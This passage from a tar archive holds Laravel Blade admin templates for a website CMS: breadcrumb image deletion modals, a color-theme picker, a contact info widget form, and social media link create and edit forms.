{{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('breadcrumb-image.destroy_image', $breadcrumb_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="breadcrumbImageDestroyModal{{ $breadcrumb_image->id }}" tabindex="-1" role="dialog" aria-labelledby="breadcrumbImageDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="breadcrumbImageDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('breadcrumb-image.destroy', $breadcrumb_image->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('breadcrumb-image.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/color_option/create.blade.php���������������������������������������������������0000644�����������������00000105372�14765366573�0016234 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.ready_color_option') }}</h4> @if (isset($color_option)) <form action="{{ route('color-option.update', $color_option->id) }}" method="POST"> @method('PUT') @csrf <div class="row"> <div class="col-md-12"> <div class="hiddenradio"> <div class=""> <label> <input type="radio" name="color_option" value="0" {{ ($color_option->color_option == 0)? "checked" : "" }}> <i class="custom-font-size custom-color-default mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="1" {{ ($color_option->color_option == 1)? "checked" : "" }}> <i class="custom-font-size custom-color-1 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="2" {{ ($color_option->color_option == 2)? "checked" : "" }}> <i class="custom-font-size custom-color-2 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="3" {{ ($color_option->color_option == 3)? "checked" : "" }}> <i class="custom-font-size custom-color-3 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="4" {{ ($color_option->color_option == 4)? "checked" : "" }}> <i class="custom-font-size custom-color-4 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="5" {{ ($color_option->color_option == 5)? "checked" : "" }}> <i class="custom-font-size custom-color-5 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="6" {{ ($color_option->color_option == 6)? "checked" : "" }}> <i class="custom-font-size custom-color-6 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="7" {{ ($color_option->color_option == 7)? "checked" : "" }}> <i class="custom-font-size custom-color-7 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="8" {{ ($color_option->color_option == 8)? "checked" : "" }}> <i class="custom-font-size custom-color-8 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="9" {{ ($color_option->color_option == 9)? "checked" : "" }}> <i class="custom-font-size custom-color-9 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="10" {{ ($color_option->color_option == 10)? "checked" : "" }}> <i class="custom-font-size custom-color-10 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="11" {{ ($color_option->color_option == 11)? "checked" : "" }}> <i class="custom-font-size custom-color-11 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="12" {{ ($color_option->color_option == 12)? "checked" : "" }}> <i class="custom-font-size custom-color-12 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="13" {{ ($color_option->color_option == 13)? "checked" : "" }}> <i class="custom-font-size custom-color-13 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="14" {{ ($color_option->color_option == 14)? "checked" : "" }}> <i class="custom-font-size custom-color-14 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="15" {{ ($color_option->color_option == 15)? "checked" : "" }}> <i class="custom-font-size custom-color-15 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="16" {{ ($color_option->color_option == 16)? "checked" : "" }}> <i class="custom-font-size custom-color-16 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="17" {{ ($color_option->color_option == 17)? "checked" : "" }}> <i class="custom-font-size custom-color-17 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="18" {{ ($color_option->color_option == 18)? "checked" : "" }}> <i class="custom-font-size custom-color-18 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="19" {{ ($color_option->color_option == 19)? "checked" : "" }}> <i class="custom-font-size custom-color-19 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="20" {{ ($color_option->color_option == 20)? "checked" : "" }}> <i class="custom-font-size custom-color-20 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="21" {{ ($color_option->color_option == 21)? "checked" : "" }}> <i class="custom-font-size custom-color-21 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="22" {{ ($color_option->color_option == 22)? "checked" : "" }}> <i class="custom-font-size custom-color-22 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="23" {{ ($color_option->color_option == 23)? "checked" : "" }}> <i class="custom-font-size custom-color-23 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="24" {{ ($color_option->color_option == 24)? "checked" : "" }}> <i class="custom-font-size custom-color-24 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="25" {{ ($color_option->color_option == 25)? "checked" : "" }}> <i class="custom-font-size custom-color-25 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="26" {{ ($color_option->color_option == 26)? "checked" : "" }}> <i class="custom-font-size custom-color-26 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="27" {{ ($color_option->color_option == 27)? "checked" : "" }}> <i class="custom-font-size custom-color-27 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="28" {{ ($color_option->color_option == 28)? "checked" : "" }}> <i class="custom-font-size custom-color-28 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="29" {{ ($color_option->color_option == 29)? "checked" : "" }}> <i class="custom-font-size custom-color-29 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="30" {{ ($color_option->color_option == 30)? "checked" : "" }}> <i class="custom-font-size custom-color-30 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="31" {{ ($color_option->color_option == 31)? "checked" : "" }}> <i class="custom-font-size custom-color-31 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="32" {{ ($color_option->color_option == 32)? "checked" : "" }}> <i class="custom-font-size custom-color-32 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="33" {{ ($color_option->color_option == 33)? "checked" : "" }}> <i class="custom-font-size custom-color-33 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="34" {{ ($color_option->color_option == 34)? "checked" : "" }}> <i class="custom-font-size custom-color-34 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="35" {{ ($color_option->color_option == 35)? "checked" : "" }}> <i class="custom-font-size custom-color-35 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="36" {{ ($color_option->color_option == 36)? "checked" : "" }}> <i class="custom-font-size custom-color-36 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="37" {{ ($color_option->color_option == 37)? "checked" : "" }}> <i class="custom-font-size custom-color-37 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="38" {{ ($color_option->color_option == 38)? "checked" : "" }}> <i class="custom-font-size custom-color-38 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="39" {{ ($color_option->color_option == 39)? "checked" : "" }}> <i class="custom-font-size custom-color-39 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="40" {{ ($color_option->color_option == 40)? "checked" : "" }}> <i class="custom-font-size custom-color-40 mr-2 fas fa-tint"></i> </label> </div> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2 mt-3">{{ __('content.submit') }}</button> </div> </div> </form> @else <form action="{{ route('color-option.store') }}" method="POST"> @csrf <div class="row"> <div class="col-md-12"> <div class="hiddenradio"> <div class=""> <label> <input type="radio" name="color_option" value="0"> <i class="custom-font-size custom-color-default mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="1"> <i class="custom-font-size custom-color-1 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="2"> <i class="custom-font-size custom-color-2 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="3"> <i class="custom-font-size custom-color-3 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="4"> <i class="custom-font-size custom-color-4 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="5"> <i class="custom-font-size custom-color-5 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="6"> <i class="custom-font-size custom-color-6 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="7"> <i class="custom-font-size custom-color-7 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="8"> <i class="custom-font-size custom-color-8 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="9"> <i class="custom-font-size custom-color-9 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="10"> <i class="custom-font-size custom-color-10 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="11"> <i class="custom-font-size custom-color-11 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="12"> <i class="custom-font-size custom-color-12 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="13"> <i class="custom-font-size custom-color-13 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="14"> <i class="custom-font-size custom-color-14 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="15"> <i class="custom-font-size custom-color-15 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="16"> <i class="custom-font-size custom-color-16 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="17"> <i class="custom-font-size custom-color-17 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="18"> <i class="custom-font-size custom-color-18 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="19"> <i class="custom-font-size custom-color-19 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="20"> <i class="custom-font-size custom-color-20 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="21"> <i class="custom-font-size custom-color-21 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="22"> <i class="custom-font-size custom-color-22 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="23"> <i class="custom-font-size custom-color-23 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="24"> <i class="custom-font-size custom-color-24 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="25"> <i class="custom-font-size custom-color-25 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="26"> <i class="custom-font-size custom-color-26 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="27"> <i class="custom-font-size custom-color-27 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="28"> <i class="custom-font-size custom-color-28 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="29"> <i class="custom-font-size custom-color-29 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="30"> <i class="custom-font-size custom-color-30 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="31"> <i class="custom-font-size custom-color-31 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="32"> <i class="custom-font-size custom-color-32 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="33"> <i class="custom-font-size custom-color-33 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="34"> <i class="custom-font-size custom-color-34 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="35"> <i class="custom-font-size custom-color-35 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="36"> <i class="custom-font-size custom-color-36 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="37"> <i class="custom-font-size custom-color-37 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="38"> <i class="custom-font-size custom-color-38 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="39"> <i class="custom-font-size custom-color-39 mr-2 fas fa-tint"></i> </label> <label> <input type="radio" name="color_option" value="40"> <i class="custom-font-size custom-color-40 fas fa-tint"></i> </label> </div> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2 mt-3">{{ __('content.submit') }}</button> </div> </div> </form> @endif <h4 class="card-title mt-5">{{ __('content.customize_color') }}</h4> @if (isset($color_option)) <form action="{{ route('color-option.update', $color_option->id) }}" method="POST"> @method('PUT') @csrf <input type="hidden" name="color_option" value="41"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="main_color">{{ __('content.main_color') }}</label> <input id="main_color" type="color" name="main_color" value="{{ $color_option->main_color }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="secondary_color">{{ __('content.secondary_color') }}</label> <input id="secondary_color" type="color" name="secondary_color" value="{{ $color_option->secondary_color }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="scroll_button_color">{{ __('content.scroll_button_color') }}</label> <input id="scroll_button_color" type="color" name="scroll_button_color" value="{{ $color_option->scroll_button_color }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="bottom_button_color">{{ __('content.bottom_button_color') }}</label> <input id="bottom_button_color" type="color" name="bottom_button_color" value="{{ $color_option->bottom_button_color }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="bottom_button_hover_color">{{ __('content.bottom_button_hover_color') }}</label> <input id="bottom_button_hover_color" type="color" name="bottom_button_hover_color" value="{{ $color_option->bottom_button_hover_color }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="side_button_color">{{ __('content.side_button_color') }}</label> <input id="side_button_color" type="color" name="side_button_color" value="{{ $color_option->side_button_color }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2 mt-3">{{ __('content.submit') }}</button> </div> </div> </form> @else <form action="{{ route('color-option.store') }}" method="POST"> @csrf <input type="hidden" name="color_option" value="41"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="main_color">{{ __('content.main_color') }}</label> <input id="main_color" type="color" name="main_color" value="#ff4500"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="secondary_color">{{ __('content.secondary_color') }}</label> <input id="secondary_color" type="color" name="secondary_color" value="#171718"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="scroll_button_color">{{ __('content.scroll_button_color') }}</label> <input id="scroll_button_color" type="color" name="scroll_button_color" value="#00baa3"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="bottom_button_color">{{ __('content.bottom_button_color') }}</label> <input id="bottom_button_color" type="color" name="bottom_button_color" value="#212529"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="bottom_button_hover_color">{{ __('content.bottom_button_hover_color') }}</label> <input id="bottom_button_hover_color" type="color" name="bottom_button_hover_color" value="#333333"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="side_button_color">{{ __('content.side_button_color') }}</label> <input id="side_button_color" type="color" name="side_button_color" value="#25d366"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2 mt-3">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/contact_info_widget/create.blade.php��������������������������������������������0000644�����������������00000024376�14765366573�0017543 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.contact_info_widget') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('contact-info-widget.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> </h4> @if (isset($contact_info_widget)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('contact-info-widget.update', $contact_info_widget->id) }}" method="POST"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $contact_info_widget->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description" value="{{ $contact_info_widget->description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="address">{{ __('content.address') }}</label> <input type="text" name="address" class="form-control" id="address" value="{{ $contact_info_widget->address }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }}</label> <input type="text" name="email" class="form-control" id="email" value="{{ $contact_info_widget->email }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input type="text" name="phone" class="form-control" id="phone" value="{{ $contact_info_widget->phone }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="working_hour">{{ __('content.working_hour') }}</label> <input type="text" name="working_hour" class="form-control" id="working_hour" value="{{ $contact_info_widget->working_hour }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#contactInfoWidgetDestroyModal{{ $contact_info_widget->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="contactInfoWidgetDestroyModal{{ $contact_info_widget->id }}" tabindex="-1" role="dialog" aria-labelledby="contactInfoWidgetDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="contactInfoWidgetDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('contact-info-widget.destroy', $contact_info_widget->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('contact-info-widget.store') }}" method="POST"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="address">{{ __('content.address') }}</label> <input type="text" name="address" class="form-control" id="address"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }}</label> <input type="text" name="email" class="form-control" id="email"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input type="text" name="phone" class="form-control" id="phone"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="working_hour">{{ __('content.working_hour') }}</label> <input type="text" name="working_hour" class="form-control" id="working_hour"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/social/create.blade.php���������������������������������������������������������0000644�����������������00000030302�14765366573�0014766 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.socials') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#socialModal">+ {{ __('content.add_social') }}</button> </div> </div> @if (count($socials) > 0) <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.socials') }}</th> <th>{{ __('content.url') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $i = 1; @endphp @foreach ($socials as $social) <tr> <td>{{ $i++ }}</td> <td><i class="{{ $social->social_media }}"></i></td> <td>{{ $social->url }}</td> <td> <form action="{{ route('social.update_status', $social->id) }}" method="POST"> @method('PATCH') @csrf @if ($social->status == 1) <button type="submit" class="btn btn-danger"> {{ __('content.disable') }} </button> @else <button type="submit" class="btn btn-success"> {{ __('content.enable') }} </button> @endif </form> </td> <td> <div> <a href="{{ route('social.edit', $social->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $social->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $social->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('social.destroy', $social->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="socialModal" tabindex="-1" role="dialog" aria-labelledby="socialModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="socialModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('social.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="social_media" class="col-form-label">{{ __('content.icon') }} <span class="text-red">*</span></label> <select class="form-control" name="social_media" id="social_media" required> <option value="" disabled selected>{{ __('content.select_your_option') }}</option> <option value="fab fa-facebook-f">Facebook</option> <option value="fab fa-twitter">Twitter</option> <option value="fab fa-google-plus-g">Google Plus</option> <option value="fab fa-youtube">Youtube</option> <option value="fab fa-instagram">Instagram</option> <option value="fab fa-vk">VK</option> <option value="fab fa-weibo">Weibo</option> <option value="fab fa-weixin">WeChat</option> <option value="fab fa-meetup">Meetup</option> <option value="fab fa-wikipedia-w">Wikipedia</option> <option value="fab fa-quora">Quora</option> <option value="fab fa-pinterest">Pinterest</option> <option value="fab fa-dribbble">Dribbble</option> <option value="fab fa-linkedin-in">Linkedin</option> <option value="fab fa-behance-square">Behance</option> <option value="fab fa-wordpress">WordPress</option> <option value="fab fa-blogger-b">Blogger</option> <option value="fab fa-whatsapp">Whatsapp</option> <option value="fab fa-telegram">Telegram</option> <option value="fab fa-skype">Skype</option> <option value="fab fa-amazon">Amazon</option> <option value="fab fa-stack-overflow">Stack Overflow</option> <option value="fab fa-stack-exchange">Stack Exchange</option> <option value="fab fa-github">Github</option> <option value="fab fa-android">Android</option> <option value="fab fa-vimeo-v">Vimeo</option> <option value="fab fa-tumblr">Tumblr</option> <option value="fab fa-vine">Vine</option> <option value="fab fa-twitch">Twitch</option> <option value="fab fa-flickr">Flickr</option> <option value="fab fa-yahoo">Yahoo</option> <option value="fab fa-reddit">Reddit</option> <option value="fas fa-rss">Rss</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input type="text" name="url" class="form-control" id="url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/social/edit.blade.php�����������������������������������������������������������0000644�����������������00000020133�14765366573�0014451 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.edit_social') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('social.update', $social->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="social_media">{{ __('content.icon') }} <span class="text-red">*</span></label> <select class="form-control" name="social_media" id="social_media" required> <option value="" disabled selected>{{ __('content.select_your_option') }}</option> <option value="fab fa-facebook-f" {{ $social->social_media === "fab fa-facebook-f" ? 'selected' : '' }}>Facebook</option> <option value="fab fa-twitter" {{ $social->social_media === "fab fa-twitter" ? 'selected' : '' }}>Twitter</option> <option value="fab fa-google-plus-g" {{ $social->social_media === "fab fa-google-plus-g" ? 'selected' : '' }}>Google Plus</option> <option value="fab fa-youtube" {{ $social->social_media === "fab fa-youtube" ? 'selected' : '' }}>Youtube</option> <option value="fab fa-instagram" {{ $social->social_media === "fab fa-instagram" ? 'selected' : '' }}>Instagram</option> <option value="fab fa-vk" {{ $social->social_media === "fab fa-vk" ? 'selected' : '' }}>VK</option> <option value="fab fa-weibo" {{ $social->social_media === "fab fa-weibo" ? 'selected' : '' }}>Weibo</option> <option value="fab fa-weixin" {{ $social->social_media === "fab fa-weixin" ? 'selected' : '' }}>WeChat</option> <option value="fab fa-meetup" {{ $social->social_media === "fab fa-meetup" ? 'selected' : '' }}>Meetup</option> <option value="fab fa-wikipedia-w" {{ $social->social_media === "fab fa-wikipedia-w" ? 'selected' : '' }}>Wikipedia</option> <option value="fab fa-quora" {{ $social->social_media === "fab fa-quora" ? 'selected' : '' }}>Quora</option> <option value="fab fa-pinterest" {{ $social->social_media === "fab fa-pinterest" 